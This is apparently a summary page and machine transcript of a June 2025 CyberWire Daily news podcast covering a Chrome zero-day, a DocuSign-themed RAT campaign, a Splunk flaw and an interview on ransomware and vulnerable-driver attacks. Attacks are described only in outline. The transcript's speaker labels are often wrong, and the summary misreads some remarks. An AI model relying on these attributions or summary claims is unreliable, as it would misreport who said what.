Zero-day déjà vu. - CyberWire Daily

Summary9 min read

CyberWire Daily: Zero-day Déjà Vu
Hosted by N2K Networks
Release Date: June 3, 2025

Introduction

In today’s episode of CyberWire Daily, hosted by Dave Bittner from N2K Networks, listeners are treated to an in-depth analysis of the latest cybersecurity threats, vulnerabilities, and industry responses. The episode, titled "Zero-day Déjà Vu," covers critical security patches, emerging malware campaigns, geopolitical cyber threats, regulatory developments, and insightful interviews with industry leaders.

Zero-Day Vulnerabilities and Patches

Google Chrome Emergency Patch

At the outset, Dave Bittner discusses a critical update from Google addressing a zero-day vulnerability in Chrome's JavaScript engine.

Summary:
Google has released an emergency patch for a zero-day vulnerability affecting Chrome's version 8 JavaScript engine. This flaw allows out-of-bounds memory access and has been exploited in the wild three times this year, primarily for espionage and account hijacking. Google's Threat Analysis Group identified the vulnerability, and a mitigation was deployed within a day. The comprehensive fix is now available in the latest versions for Windows, Mac, and Linux. To safeguard users, Google is withholding full exploit details until the majority apply the patch.
Notable Quote:
“Google is withholding full details of the exploit until more users apply the patch.”
— Dave Bittner [00:12]

New Malware Campaigns

Fake DocuSign CAPTCHA to Deploy RATs

A sophisticated malware campaign is leveraging fake DocuSign CAPTCHA pages to deceive users into installing the NetSupport Remote Access Trojan (RAT).

Details:
According to Domain Tools, attackers create spoofed websites mimicking DocuSign branding. Users are tricked into checking a box, which triggers clipboard poisoning. A malicious PowerShell script is then copied to the clipboard with instructions for manual execution. If executed, the script downloads additional payloads, establishes persistence through GitHub-hosted malware, and installs the NetSupport RAT, granting remote control over the victim’s system. The campaign employs techniques like ROT13 encoding and script chaining to evade detection, with domains also imitating services like Okta, Netflix, and Spotify.
Advisory:
“Domain Tools warns users to be cautious of sites prompting script execution and to inspect URLs and certificates carefully to avoid deception-based threats.”
— Dave Bittner [00:19]

Splunk Universal Forwarder Vulnerability

High-Severity Flaw in Splunk

A significant vulnerability has been identified in Splunk Universal Forwarder for Windows, posing severe risks to organizations relying on Splunk for log forwarding and security.

Key Points:
The vulnerability allows non-admin users to modify critical directories due to improper permission settings during installation or upgrades. With a CVSS score of 8, this flaw affects multiple versions and can lead to data breaches or tampered audit trails. Splunk has urged immediate upgrades to patched versions and provided a mitigation to strip vulnerable permissions, emphasizing the necessity of these measures post-installation or upgrades to maintain security integrity.
Notable Quote:
“The bug enables potential exposure or manipulation of log data, which could lead to data breaches or tampered audit trails.”
— Dave Bittner [00:24]

Geopolitical Cyber Threats

China’s Cyber Infiltration and Preparations for War

Retired Lt. Gen. H.R. McMaster has raised alarms about China’s deep infiltration into U.S. telecommunications and critical infrastructure, framing it as part of a broader strategy for potential warfare.

Insights:
During a House Homeland Security committee field hearing, McMaster linked cyber campaigns like Volt Typhoon to China’s expanding military capabilities, including a 44-fold increase in defense budget and the development of first-strike nuclear capabilities. He also referenced Chinese surveillance balloons targeting U.S. strategic communications.
Industry Perspective:
Wendy Whitmore from Palo Alto Networks echoed these concerns, highlighting that alongside nations like Russia, Iran, and North Korea, China is becoming increasingly aggressive in cyberspace. Palo Alto Networks reportedly blocks up to 31 billion attacks daily, emphasizing the need for enhanced public-private collaboration and supportive legislation to strengthen joint cyber defense efforts.
Notable Quote:
“China, alongside Russia, Iran and North Korea, is becoming more aggressive in cyberspace.”
— Wendy Whitmore, Palo Alto Networks [00:44]

Regulatory Developments

FCC’s Proposed Ownership Reporting Rules

The Federal Communications Commission (FCC) has proposed new rules to expand ownership reporting requirements, aiming to identify and mitigate control by foreign adversaries.

Summary:
The proposed regulations will affect entities not previously required to report ownership, including private radio license holders and video service providers. Companies must disclose if they are controlled by foreign adversaries such as China, Russia, Iran, or North Korea, especially if these parties hold 10% or more in voting or equity interest. Non-compliance could result in fines or license revocation. Additionally, the FCC is considering periodic reporting updates, with the final rules expected to take effect by 2026.
Legislative Action:
Senators Jim Risch and John Hickenlooper introduced the Energy Threat Analysis Program Act to bolster cybersecurity collaborations within the US energy sector. This legislation seeks to formalize the Department of Energy’s Energy Threat Analysis center as a central hub for cyber threat intelligence, addressing fragmented threat reporting and enhancing early warnings and threat mitigation strategies.
Notable Quote:
“The goal is to improve early warnings and threat mitigation in response to increasingly complex cyber attacks.”
— Dave Bittner [00:32]

Mobile Threats

Krokodylis Android Malware Evolves

The Krakodielis Android malware has introduced new features that add fake contacts to victims' phones, enabling attackers to spoof calls from trusted sources like banks or friends.

Details:
Initially observed in Turkey in early 2025, Krokodylis has since expanded globally, targeting victims across all continents. The malware now incorporates advanced social engineering tactics and enhanced evasion techniques such as code packing and local data parsing. Researchers urge users to download apps exclusively from trusted sources to mitigate these threats.
Warning:
“Krokodylis is evolving fast and urges users to download apps only from trusted sources.”
— Dave Bittner [00:36]

Recent Incidents

SentinelOne Global Outage

SentinelOne experienced a significant outage on May 29, impacting its services for approximately 20 hours.

Impact:
The outage affected access to the SentinelOne management console but did not compromise endpoint protection or customer data. The disruption was caused by a flaw in a legacy infrastructure control system, triggered by a faulty configuration from a new account setup. In response, SentinelOne is accelerating its transition to a new infrastructure-as-code architecture, enhancing automated recovery processes, and improving customer communication protocols. Notably, GovCloud customers remained unaffected due to infrastructure segregation.
Notable Quote:
“SentinelOne has published a detailed analysis of the global outage that impacted its services...”
— Dave Bittner [00:37]

Swatting Campaign Case

A Romanian citizen, Tomasz Szabo, has pleaded guilty to orchestrating a swatting campaign targeting around 100 individuals, including a former US president and members of Congress.

Details:
The campaign involved making false emergency calls to provoke aggressive police responses, including hoaxes of fake murders and bomb threats at officials' residences. Szabo acted in collaboration with Serbian co-defendant Namanja Radovanovic, who faces pending charges.
Notable Quote:
“The indictment describes politically neutral targeting and includes a January 2024 hoax involving a fake murder and bomb threat at a former official's home.”
— Dave Bittner [00:38]

Cartier Data Breach

Luxury brand Cartier has disclosed a data breach where an unauthorized party accessed its systems, collecting names, emails, and countries of residence.

Response:
Cartier assured customers that it has strengthened its cybersecurity measures and advised vigilance against any suspicious or mysterious messages. The company emphasized that the breach was brief and not intended for malicious purposes, humorously noting, “presumably not for a holiday card list.” This incident follows similar breaches reported by DeOrr and Tiffany in May.
Notable Quote:
“Cartier advises staying wary of any mysterious messages.”
— Dave Bittner [00:39]

Featured Interviews

John Miller, CEO and Co-founder of Halcyon: Combating Ransomware and Vulnerable Drivers

Dave Bittner engages in a comprehensive discussion with John Miller, CEO and co-founder of Halcyon, focusing on ransomware threats and innovative defense mechanisms.

Halcyon’s Focus on Anti-Ransomware:
Miller explains that Halcyon is the first company dedicated exclusively to anti-ransomware solutions. Unlike generalized cybersecurity tools that adhere to frameworks like MITRE’s ATT&CK, Halcyon dissects ransomware behaviors to build tailored defenses, effectively addressing the specific tactics used by ransomware groups.
Ransomware as a Business Model:
“Ransomware is a business. They're all about ROI... if you build the biggest obstacle for that, you break them.”
— John Miller [14:20]
Evolution of Ransomware Tactics:
The conversation delves into the shift from traditional encryption-based ransomware to double and potentially triple extortion techniques. Double extortion involves threatening to leak stolen data alongside encrypting it, increasing pressure on victims to pay ransoms. Miller anticipates the future of triple extortion, where attackers leverage AI to exploit stolen data further, making ransomware attacks even more devastating.
- Notable Insight:
  “With AI, it's like go through every piece of hay and separate out all the needles.”
  — John Miller [19:06]
Bring Your Own Vulnerable Driver (BYOVD) Attacks:
Miller introduces the concept of BYOVD attacks, where attackers exploit outdated, still-signed Windows drivers with known vulnerabilities to gain kernel-level access, bypassing traditional Endpoint Detection and Response (EDR) systems.
- Explanation:
  “Instead of going out and finding a zero-day and writing an exploit, I can take an old Windows driver that's still signed and valid.”
  — John Miller [21:01]
- Halcyon’s Defensive Strategy:
  Halcyon employs multiple layers of protection, including machine learning models trained specifically on ransomware behavior, to detect and halt ransomware activities before they can inflict significant damage. Their approach emphasizes resilience, ensuring that even if a ransomware attack is partially successful, recovery processes can neutralize the threat swiftly.
- Notable Quote:
  “If we think it's ransomware, we kill it.”
  — John Miller [23:40]
Future of Ransomware:
The discussion concludes with Miller warning of the escalating sophistication and accessibility of ransomware attacks, highlighting the low barrier to entry and the potential for widespread disruption in the coming years.
- Key Statement:
  “The next five to 10 years are going to be not great.”
  — John Miller [27:03]

Hacker Group Naming Collaboration: Clarifying the Chaos

Dave Bittner also features a dialogue with Maria Vermazes from the T Minus Space Daily Podcast, delving into the collaborative efforts by major cybersecurity firms to standardize hacker group nomenclature.

Current Challenges:
The cybersecurity community faces significant confusion due to disparate naming conventions for hacker groups across different organizations. This fragmentation complicates threat intelligence sharing and communication.
- Maria’s Observation:
  “It feels like a good move... But I have some concerns about how this will actually work.”
  — Maria Vermazes [30:40]
Collaboration Efforts:
Microsoft, CrowdStrike, Google's Mandiant, and Palo Alto Networks have joined forces to create a unified framework for naming hacker groups. The initiative aims to act as a "Rosetta Stone," allowing cross-referencing between existing naming standards.
- John Miller’s Input:
  “If you really want to help... include phonetic pronunciation guides for all of these.”
  — John Miller [32:25]
Implementation Concerns:
Both guests express skepticism about the practicality and effectiveness of the new standard, citing potential redundancies and maintenance challenges.
- Maria’s Concern:
  “Good luck to whoever has to maintain that. That's gonna be such a nightmare...”
  — Maria Vermazes [31:32]
- John’s Suggestion:
  “We will be forever grateful and we will forgive you for the redundancy that this new standard seems to be introducing to the ecosystem.”
  — John Miller [32:25]

Conclusion

Dave Bittner wraps up the episode by encouraging listeners to access the CyberWire daily briefing for comprehensive coverage of today’s stories. Additionally, he invites audience participation through the annual survey to gather listener insights.

Final Note:
“For links to all of today's stories, check out our daily briefing@thecyberwire.com. We'd love to hear from you.”
— Dave Bittner [33:24]

Notable Advertisements Skipped

Following the structured content, the podcast includes sponsored messages from Spy Cloud, Vanta, and DeleteMe. As per the summary guidelines, these advertisements have been omitted to focus solely on the informative and analytical content of the episode.

Credits
N2K's Senior Producer: Alice Carruth
CyberWire Producer: Liz Stokes
Mixed by: Trey Hester
Original Music and Sound Design: Elliot Peltzman
Executive Producer: Jennifer Ibin
Publisher: Peter Kilpe

This detailed summary encapsulates the key discussions, insights, and conclusions presented in the "Zero-day Déjà Vu" episode of CyberWire Daily, providing a comprehensive overview for those who may not have had the chance to listen.

Loading summary

Transcript113 lines

[00:02]
Dave Bittner
You're listening to the Cyberwire network, powered by N2K.
[00:12]
John Miller
And now a word from our sponsor. Spy Cloud Identity is the new battleground and attackers are exploiting stolen identities to infiltrate your organization. Traditional defenses can't keep up. Spy Cloud's holistic identity threat protection helps security teams uncover and automatically remediate hidden exposures across your users from breaches, malware and phishing to neutralize identity based threats like account takeover, fraud and ransomware. Don't let invisible threats compromise your business. Get your free corporate Darknet exposure report@spycloud.com cyberwire and see what attackers already know. That's spycloud.com cyberwire Google issues an emergency patch for a Chrome zero day a new malware campaign uses fake DocuSign CAPTCHA pages to trick users into installing a RAT. A high severity splunk vulnerability allows non admin users access to modify critical directories. Experts warn Congress that Chinese infiltrations are preparations for war. Senators look to strengthen cybersecurity collaboration in the US Energy sector. Crocodiles Android malware adds fake contacts to victims phones. Sentinel 1 publishes a detailed analysis of their recent outage. Cartier leaves some of its Cyber Sparkle exposed. Our guest is John Miller, CEO and co founder of Halcyon, discussing Bring your own vulnerable driver attacks and Microsoft and CrowdStrike tackle hacker naming or do they? It's Tuesday, June 3rd, 2025. I'm Dave Bittner and this is your Cyberwire Intel Briefing. Thanks for joining us here today. It's great to have you with us. Google has issued an emergency update patch to a Chrome Zero day, the third such vulnerability in Chrome exploited in the wild this year. The flaw, found in Chrome's version 8 JavaScript engine, allows out of bounds memory access and was discovered by Google's Threat Analysis Group. A mitigation was applied within a day and the full fix is included in recent versions for Windows and Mac and Linux. Google is withholding full details of the exploit until more users apply the patch. Earlier in 2025, Chrome Zero Days were used in espionage and account hijacking campaigns. Last year, Google Patch 10 exploited or demoed Chrome Zero Days. A new malware campaign is using fake DocuSign CAPTCHA pages to trick users into installing the NetSupport remote access trojan, according to Domain Tools. The attack begins with a spoofed website that mimics DocuSign branding. Users are prompted to check a box which triggers clipboard poisoning. A malicious PowerShell script is copied to the clipboard with instructions to run it manually. If executed, the script downloads further payloads, sets up persistence via GitHub hosted malware, and ultimately installs NetSupport RAT for remote control. The campaign uses familiar tools and layered tactics like ROT 13 encoding and script chaining to evade detection. Domains mimicking Okta, Netflix and Spotify were also used. Domain Tools warns users to be cautious of sites prompting script execution and to inspect URLs and certificates carefully to avoid deception based threats. A high severity vulnerability in Splunk Universal Forwarder for Windows allows non admin users to access and modify critical directories due to incorrect permission settings during installation or upgrades. With a CVSS score of 8, this flaw affects multiple versions, posing significant risks to organizations that rely on Splunk for log forwarding and security. The bug enables potential exposure or manipulation of log data, which could lead to data breaches or tampered audit trails. Splunk urges immediate upgrades to patched versions for those unable to upgrade. A mitigation is available to strip vulnerable permissions. This fix must be applied after any install, upgrade or reinstall to prevent unauthorized access and maintain security integrity. Retired Lt. Gen. H.R. mcMaster warned lawmakers that China's deep infiltration into U.S. telecommunications and critical infrastructure is part of a broader war preparation strategy. Speaking at a House Homeland Security committee field hearing, McMaster linked recent cyber campaigns like Volt Typhoon to China's growing military ambitions, including a 44 fold defense budget increase and a possible first strike nuclear capability. He also cited Chinese surveillance balloons aimed at U.S. strategic communications. Palo Alto Network's Wendy Whitmore echoed concerns, noting that China, alongside Russia, Iran and North Korea, is becoming more aggressive in cyberspace. Palo Alto blocks up to 31 billion attacks daily, including millions of new threats. Whitmore stressed the need for faster two way public private collaboration and supported legislation to strengthen the Joint Cyber Defense Collaborative. The FCC has issued a proposed rule that would expand ownership reporting requirements for nearly all entities it regulates, aiming to identify control by foreign adversaries. The rule would affect companies not currently required to report ownership and including private radio license holders and video service providers. Entities must disclose if they are controlled by foreign adversaries like China, Russia, Iran or North Korea, including if such parties hold 10% or more in voting or equity interest. Failure to comply could result in fines or license revocation. If foreign control is reported, detailed ownership disclosures would be made public and could trigger national security reviews. The FCC is also considering requiring updates or periodic reporting, with final rules likely to take effect by 2026. Senators Jim Risch, Republican from Idaho, and John Hickenlooper, Democrat from Colorado, have introduced the Energy Threat Analysis Program act to strengthen cybersecurity collaborations in the US Energy sector. The bill would formalize the Department of Energy's Energy Threat Analysis center as a central hub for cyber threat intelligence, coordinating efforts between the doe, CISA intelligence agencies and private energy operators. The goal is to improve early warnings and threat mitigation in response to increasingly complex cyber attacks. The legislation comes amid growing concern over fragmented threat reporting and critical infrastructure vulnerabilities highlighted by a recent blackout in Spain and Portugal. Both senators emphasize the need for a resilient energy grid and improve data sharing to safeguard national security. The latest version of the Krakadielis Android malware introduces a new feature that adds fake contacts to victims phones, allowing attackers to spoof calls from trusted sources like banks or friends. First observed in Turkey in early 2025, Krakodylus has since expanded globally, now targeting victims on every continent alongside enhanced social engineering. Recent updates also include stronger evasion techniques such as code packing and local data parsing. Researchers warn Krokodylis is evolving fast and urge users to download apps only from trusted sources. SentinelOne has published a detailed analysis of the global outage that impacted its services on May 29, attributing it to a flaw in a legacy infrastructure control system. The disruption, lasting about 20 hours, affected access to the SentinelOne management console but did not compromise endpoint protection or customer data. The incident began when a new account triggered faulty configuration logic to erasing critical DNS and network routes. Sentinelon has since taken steps to prevent recurrence, including accelerating its move to a new infrastructure as code architecture, backing up transit gateway settings and enhancing automated recovery and customer communication protocols. Notably, GovCloud customers were unaffected due to infrastructure segregation. Tomasz Szabo, a 26 year old Romanian citizen, pleaded guilty to conspiracy and making bomb threats as part of a swatting campaign targeting about 100 individuals, including a former US president and members of Congress. The plot involved false emergency calls to provoke aggressive police responses. Szabo, extradited last year, acted with Serbian co defendant Namanja Radovanovic, who faces pending charges. The indictment describes politically neutral targeting and includes a January 2024 hoax involving a fake murder and bomb threat at a former official's home. Cartier, the luxury brand known for diamond studded discretion, has disclosed a data breach that left some of its sparkle exposed. In a politely worded note, Cartier admitted that an unauthorized party briefly wandered through its systems, collecting names, emails and countries of residence and presumably not for a holiday card list. The company assures customers it's now added extra polish to its cybersecurity, but advises staying wary of any mysterious messages. Fashionably late to the breach club, Cartier joins DeOrr and Tiffany in May's cyber soiree. Here's the thing to do. Spend a grand or two at Cartier. Coming up after the break, my conversation with John Miller from Halcyon. We're discussing bring your own vulnerable driver attacks and Microsoft and CrowdStrike tackle hacker naming or do they stick around?
[12:08]
Maria Vermazes
Compliance regulations, third party risk and customer security demands are all growing and changing fast. Is your manual GRC program actually slowing you down? If you've ever found yourself drowning in spreadsheets, chasing down screenshots or wrangling manual processes just to keep your GRC program on track, you're not alone. But let's be clear, there is a better way. Vanta's trust management platform takes the headache out of governance, risk and compliance. It automates the essentials from internal and third party risk to consumer trust, making your security posture stronger. Yes, even helping to drive revenue. And this isn't just nice to have. According to a recent analysis from IDC, teams using Vanta saw a 129% boost in productivity. That's not a typo, that's real impact. So if you're ready to trade in chaos for clarity, check out Vanta and bring some serious efficiency to your GRC game. Vanta GRC how much easier trust can be? Get started@vanta.com Cyber.
[13:28]
John Miller
John Miller is CEO and co founder of Halcyon. I recently caught up with him at the RSAC conference for this sponsored conversation about bring your own vulnerable driver attacks.
[13:41]
Interviewer
We are continuing our conversations here at RSAC 2025. And joining me here is John Miller. He is the CEO and founder of Halcyon. John, welcome.
[13:53]
Dave Bittner
Thank you. Thanks for having me.
[13:55]
Interviewer
So before we dig into our topics here, for folks who may not be familiar with the company, give us the brief description of what Halcyon does.
[14:04]
Dave Bittner
So Halcyon is the first focused anti ransomware company. So I came up with the idea that even though we're in the most sophisticated state of cybersecurity ever, the ransomware groups keep getting more ground, right?
[14:20]
John Miller
Yeah.
[14:21]
Dave Bittner
And so my theory was it's because everyone's too generalized, right? If you look at an endpoint, if you look at a network technology, they have to stop everything, everything in a mitre, ATT and CK framework. And my thought process was if we focused on ransomware, took apart what they were doing and tailor built an obstacle for them, their techniques, their tools, we could be more effective.
[14:47]
Co-Host
Right.
[14:47]
Dave Bittner
So essentially, take a look at the edges of the security landscape where there are cracks that the attackers are exploiting. And instead of trying to build something that's parity that already exists, just focus on those cracks.
[15:03]
Co-Host
Right.
[15:03]
Dave Bittner
Coming in with another layer, make sure the data doesn't get exfiltrated, make sure that they can't lateralize through an environment, and make sure that if they can affect availability of data, we can always recover it at a speed that's so quick, it's not a big deal anymore.
[15:22]
Co-Host
Right.
[15:23]
Dave Bittner
I like to tell customers that if a ransomware attack's successful and it just affects a single host and the data doesn't leave that host, and the data that gets encrypted on that host is back in like an hour, is it a big deal? And the answer is always, no, it's not. We can deal with one computer being down, it's all of them being down that turns into a big problem. So we tried to focus on that value prop, not necessarily protecting everything, but being resilient against an attack where if they're successful, you can evict them out and make sure that they never get enough leverage to make somebody pay them.
[16:07]
Interviewer
Well, I mean, help me understand your approach to that problem. How much of it is looking at the individual ransomware groups and the tactics, techniques, and procedures that they use, versus looking at the menu of potential weaknesses that the users have.
[16:26]
Dave Bittner
It's all ransomware groups. Okay, Right. So that's where we've really differentiated it. I like to call it attacker led growth. Right there, you know, 300, 350 different ransomware groups. And when you look at their tools and tactics and, you know, procedures, they're more much similar than they are dissimilar.
[16:47]
Co-Host
Right.
[16:47]
Dave Bittner
So the whole thought was it's not like defending against an apt where they have a goal and they will do whatever it takes to get that goal. Ransomware is a business. They're all about roi. So if you watch what they're doing and build the biggest obstacle for that, you break them. They get to a point where they're expending so much effort, they. They're not gaining ground. They literally just pack up and leave. Right. And that's what it's all about. Exploiting the weaknesses of the fact that ransomware is a business. And because of that, you can come at them with business obstacles and break it.
[17:27]
Interviewer
As you look at the, the trending lines of ransomware, you know, the evolution of it, I, in My mind, you know, we're seeing less and less encryption and more double extortion. Is that an accurate perception?
[17:42]
Dave Bittner
So I wouldn't say less and less.
[17:45]
Interviewer
Okay, Right.
[17:47]
Dave Bittner
What we found over the last couple years are people are more reserved in paying them. Everybody understands if you pay these guys, it keeps them going.
[17:55]
John Miller
Right.
[17:55]
Dave Bittner
So everyone you know is trying to get backups, do their own recovery. And what they found is, yeah, that double extortion piece of exfoliant, those files and threatening to leak them gets people to pay. They're definitely groups now where that's all they do. They don't do the lockup at all, but the lockups are still happening. And then what we're starting to see, and you're going to love this, so you add the encryption, the single extortion, then you add the data. Double extortion. Triple extortion comes next, right? Which is. So think about this.
[18:31]
Interviewer
Go on.
[18:33]
Dave Bittner
And what's left?
[18:35]
Interviewer
What's left to extort the actual information.
[18:39]
Co-Host
Right.
[18:39]
Dave Bittner
So in double extortion, they have the information. They say, if you don't give me money, I'm going to leak it. Right. Triple extortion is. I'm going to read the data and make money off of that.
[18:50]
Co-Host
Right.
[18:51]
Dave Bittner
So imagine they compromise a giant corporation.
[18:54]
John Miller
Yeah.
[18:55]
Dave Bittner
And this is. Everyone loves talking about AI at rsa. What happens when you can take an entire company's email school and have an LLM read every email and then answer your questions?
[19:07]
Co-Host
Right.
[19:07]
Dave Bittner
All the chat logs. We're now at a point now where there was so much data that they couldn't really make use of it.
[19:14]
Co-Host
Right.
[19:14]
Dave Bittner
You're looking for a needle in a haystack, but with AI, it's like go through every piece of. Of hay and separate out all the needles. So I think you're going to see more and more of, you know, more attackers, more aggressive attacks, and then them trying to figure out what they can do to essentially increase the pain.
[19:34]
Co-Host
Right.
[19:34]
Dave Bittner
How do I get more leverage if you're not paying now? How can I make it more painful to make sure that you pay?
[19:42]
Interviewer
There's a term that you shared with me that I want to be sure we touch on.
[19:46]
John Miller
And.
[19:46]
Interviewer
And it's bring your own vulnerable driver. By O V. D. Explain that for us.
[19:53]
John Miller
Unpack that.
[19:54]
Dave Bittner
All right, so before I unpack that, I. I saw a LinkedIn post this morning.
[19:58]
John Miller
Yeah.
[19:59]
Dave Bittner
And somebody's been going around RSA graffiti tagging, right. And it was funny because 10 years ago there was this whole, like, AB is dead. Right. Do you remember that? Yeah, I think it was one of the semantic attacks came out. He was like, av is dead. And then everyone jumped on it. What they're tagging is EDR is easily bypassable and bring your own vulnerable driver attacks are the easiest, most common way for EDR to be bypassed in a ransomware attack today, as well as APT attacks. And so what bring your own vulnerable driver is is the attackers are figured out. Instead of going out and finding a zero day and writing an exploit, I can take an old Windows driver that's still signed and valid. And in the Windows catalog, where someone's already found a vulnerability, they've already published PoC code. The manufacturer responded, they came out with a new version. But the problem is you can still load that old version.
[21:01]
Co-Host
Right.
[21:02]
Dave Bittner
They don't block it because if they block. Blocked it, people that hadn't upgraded yet and kill them. So what they do is when an attacker gets in, they'll actually bring a vulnerable driver with them. If. If there's one not present, they'll then load that up into the system, exploit it to get kernel privileges, and then disable the edr.
[21:25]
Co-Host
Right.
[21:25]
Dave Bittner
And it's something that the EDR can't really protect against. It's a problem with Windows that architecturally can't really be solved because nobody updates everything in real time.
[21:34]
John Miller
Right. Right.
[21:35]
Dave Bittner
And so we were the first company to come out with. How do we. What are the best ways to protect the EDR?
[21:42]
Co-Host
Right.
[21:43]
Dave Bittner
CrowdStrike's amazing product. It's very expensive.
[21:46]
John Miller
Yeah.
[21:47]
Dave Bittner
How do you make sure that it's on delivering that protection in an attack when you actually need it? And so we rolled out what we called sidekick protections, like Batman and Robin. George Kurtz is Batman. I'm Robin.
[22:00]
John Miller
Young Ward.
[22:01]
Dave Bittner
Yeah, I'm this Young Ward. And it's not just CrowdStrike, it's Defender. It's Palo Alto at Sentinel One.
[22:07]
John Miller
Right.
[22:07]
Dave Bittner
But actually watching for the signals of these attackers coming in and attacking the ER to convict them and shut them down, or if they get all of the way to actually terminating the process, be the one that's sitting there watching it being like, CrowdStrike just got disabled. Something bad's going on.
[22:26]
Co-Host
Right.
[22:27]
Dave Bittner
Where that level of signal hasn't existed yet.
[22:30]
Co-Host
Right.
[22:32]
Dave Bittner
It's very much following what the attackers are doing and trying to figure out the best way and very focused features to really defeat kind of that 80%. I always joke with my team that we have like 10 different layers of protection and we shot for 80%. And I'm like, 10 layers, 80%, that's 800% efficacy. I can live with that.
[22:54]
Co-Host
Right.
[22:55]
Dave Bittner
But it, it very much. I was at a talk last night and George Kurtz was talking about the, the crash, the unpleasantness.
[23:06]
Co-Host
Right.
[23:07]
Dave Bittner
And he was like, it was a Swiss cheese problem where there are always holes. And he was like, there was the one time where all the, all the layers went together. You could see all the way through. Right, right. So it's. How do you come in with those multiple layers where even if somebody's going to get through, you know, on the other side there's a layer. On the other side there's a layer, so on and so on. It's all about defense and depth.
[23:28]
Interviewer
Well, so help me understand, you know, as a comparatively non technical person, how does it work? Are you looking at behavioral things? Are you, how do you make sure all of it?
[23:40]
John Miller
Yeah.
[23:41]
Dave Bittner
So the best way to think about us is we fill this spot between where an EDR ends and you have to go to backups, to recovery.
[23:50]
Co-Host
Right.
[23:50]
Interviewer
Okay.
[23:51]
Dave Bittner
So after an antivirus, or edr, whatever, takes a look at something and says, this is good, let it run. We come in behind them and we take a second look. So we have a pre execution engine that, this is going to sound crazy, runs on machine learning models. They're just trained on ransomware. Nobody else has done that for some reason. So it goes to run, we take a look at it and say, do we think this is ransomware? If we think it's ransomware, we kill it.
[24:17]
Co-Host
Right.
[24:17]
Dave Bittner
If we're not sure, we'll let it run. And then we have a behavioral engine. And what we do behaviorally is we look for data exfiltration and stop it. We look for him attacking the edr, we look for him tampering with backups. And then we look for the actual ransomware encryption behavior. They start encrypting files and deleting stuff. And so if it gets that far, we'll actually stop the encryption. What really makes us unique is when that encryption starts to run, we capture and copy the keys, we tokenize them and we cache them. We don't know if they're good or bad yet, but we know they could be. So let's hold onto it for a little bit. And if it's ransomware, we'll stop it. There's a stage that comes in where there's an attacker on your network on that host with admin credentials. So we come in, we have a team called Rise. It's a 24 by 7 SoC, and in real time, right within 60 seconds, they'll start evicting that attacker. They'll start looking at what account is it using, how did it get there, Push them out, and then at the same time recover that endpoint. So we always say within minutes of getting the attacker out of the network, everything's restored. If something was encrypted, it's decrypted. It makes networks the most theoretically resilient we can come up with to a ransomware attack.
[25:40]
Interviewer
Where do you suppose we're headed with ransomware? Like, what's, what's next?
[25:45]
Dave Bittner
Not to a good location, I'll tell you that. The barrier to entry to ransomware is really low.
[25:53]
Co-Host
Right, right.
[25:54]
Dave Bittner
You said that you're not a technical guy. I could teach you how to be a ransomware guy in two hours.
[25:59]
Interviewer
My retirement plan, John.
[26:02]
Dave Bittner
So I, I don't know if this is a good thing to say. Belize has no computer crimes laws.
[26:09]
Co-Host
Right.
[26:09]
Dave Bittner
So if you want to retire down to Belize, they speak English there, run a ransomware empire, just focus on hacking Russian companies, and I think everyone will be okay with it.
[26:18]
Interviewer
Yeah, I mean, I, I mean, I'm being flippant about it, but I think that's a really important point, is, is that the barrier to entry is practically zero.
[26:27]
Dave Bittner
And it keeps getting easier and easier and easier.
[26:29]
John Miller
Yeah.
[26:30]
Dave Bittner
And so what we're seeing is the actual attackers are growing. We're getting more people that are willing to do this because, well, you're not. You might not be willing to be a hacker to go hack someone for a thousand bucks for $20 million.
[26:43]
Co-Host
Right.
[26:44]
Dave Bittner
Like, and if your sophistication is admin level, you can crush it. And there's no real. I mean, the FBI is doing a great job, but the problem is the majority of these people are in Russia and there's very little they can do there.
[27:01]
John Miller
Right.
[27:03]
Dave Bittner
So you've got all of these threat actors coming online and countries where they normally didn't have offensive cyber stuff going on before, and then on top of it. I hate to say it, but critical infrastructure, the Colonial Pipeline attack proved that you can attack American critical infrastructure. You can get paid for it, and you can get away with it.
[27:27]
Co-Host
Right?
[27:28]
Dave Bittner
So now we have, like, you can do whatever you want. Everyone that wants to do it can do it. It's super easy. You're going to get money and nobody's going to try to arrest you. It's full on a recipe for disaster.
[27:41]
Co-Host
Right.
[27:43]
Dave Bittner
I, I always used to say that security is only limited by the amount of people that have the skill and the motivation to do it right. Like a great example was when Heartbleed came out years and years ago. It wasn't like the Internet broke. And I'm like, it's, it's not, not that a thousand new attackers came online that day to exploit that vulnerability. And what we're seeing now is just a I above linear rise and the actual people that are willing to do this and have the capabilities to. And then on top of it, the sophistication of these attacks is going over kind of nation state levels now where nation states have rules, there are things they're allowed to do, there are things that they aren't allowed to do. Criminals have no rules. Right. They get to do whatever works best. And yeah, I think the next five to 10 years are going to be not great.
[28:44]
John Miller
That's John Miller, CEO and co founder of Halcyon. And finally, one of the challenges of having this particular job that this podcast host has is keeping track of all of the names of different threat actors. You got your Cozy Bears, you got your Volt Typhoons, you got your Salt Typhoons. Everybody has different names for things. Well, we've been seeing a lot of coverage of a collaboration between Microsoft, Crowdstrike, Google's Mandiant and Palo Alto Networks to join forces to try to clean up this messy, confusing world of hacker group names. Joining me here is Maria Vermazes from the T Minus Space Daily Podcast and also colleague here at N2K. Maria, welcome. Hi.
[29:53]
Guest
Thanks, Dave.
[29:55]
John Miller
So let's dig in here. When you saw this news come across, what was your initial thought here?
[30:02]
Guest
Well, the very first thing, honestly, was the XKCD comic about there are 14 competing standards. And now everyone agrees that there needs to be a new standard that covers everyone's cases. And the update is now there are 15 competing standards. So I feel like I should just paste that comic on my wall because it applies so often. It feels like a good move. I mean, it's a noble thing that they're trying to achieve and certainly they're huge players in the space, so maybe everyone will follow their lead. I'm sure that's their hope. But I have some concerns about how this will actually work.
[30:40]
John Miller
Well, there's been a little confusion. I've seen some reporting interpreting this that all these groups are going to adopt Microsoft's naming conventions and Microsoft uses different types of weather for different groups. But that doesn't seem to be the case. When you look at how CrowdStrike is describing this and some of the other folks, it seems as though this is just going to be a Rosetta Stone where everyone gets to keep their own names, but we have a handy spreadsheet to cross reference.
[31:15]
Guest
And good luck, everybody. And good luck to whoever has to maintain that. That's gonna be such a nightmare going forward, let alone just at the starting point. So it's. Again, I just. I have so many questions about how this is gonna work.
[31:32]
John Miller
Well, as our Cyberwire editor here pointed out, Tim Nodar said that Mitre has been doing this. There's an online source called Malpedia that.
[31:42]
Guest
Does this, so why not use that? I don't understand. Why do we have to make a new competing standard? I don't get it.
[31:50]
John Miller
Yeah, yeah. Again, I think coming from a position of good faith and trying to address something that everybody recognizes is a problem. But is this a step forward? I don't know.
[32:06]
Guest
Time will tell, Dave. Time will tell.
[32:09]
John Miller
